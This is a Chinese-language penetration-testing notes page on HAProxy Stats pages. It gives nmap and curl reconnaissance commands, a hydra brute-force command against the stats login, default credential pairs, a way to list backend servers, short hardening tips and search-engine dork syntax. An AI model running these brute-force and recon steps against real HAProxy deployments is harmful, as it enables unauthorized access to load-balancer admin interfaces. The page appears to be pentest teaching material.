---
title: "80 - Haproxy"
weight: 80
date: "2026-03-09T09:23:30+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **Haproxy** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

## 服务概述

HAProxy Stats 页面提供负载均衡管理。弱密码、暴露管理界面是主要安全问题。

**默认端口**: 8404, 9000 (常见)  
**危害等级**: ⭐⭐⭐

---

## 信息收集

### 服务识别

```bash
# nmap 扫描
nmap -sV --script http-title -p 8404 TARGET

# 访问 Stats 页面
curl http://TARGET:8404/stats
```

---

## 常见攻击手法

### 1. 暴力破解

**利用**:
```bash
# hydra
hydra -l admin -P rockyou.txt http-get://TARGET:8404/stats

# 常见凭据
admin:admin
admin:password
stats:stats
```

### 2. 后端服务器访问

**原理**: 通过 HAProxy 访问后端服务器。

**利用**:
```bash
# 如果 HAProxy 配置不当
# 可直接访问后端服务

# 查看后端服务器 IP
curl http://TARGET:8404/stats;csv

# 尝试访问后端
curl http://BACKEND_IP:PORT
```

---

## 防御建议

```bash
# 1. 启用认证
# 使用强密码

# 2. 限制访问
# 仅允许内网访问

# 3. 隐藏 Stats 页面
# 不暴露公网
```

---

## 参考链接

- [HackTricks - 80-haproxy](https://book.hacktricks.wiki/en/network-services-pentesting/80-haproxy.html)

---

---

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="80"
```

#### Shodan

```bash
# Shodan 搜索语法
port:80
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:80
```

---

## 📖 参考资料

- [HackTricks - 80-haproxy](https://book.hacktricks.wiki/en/network-services-pentesting/80-haproxy.html)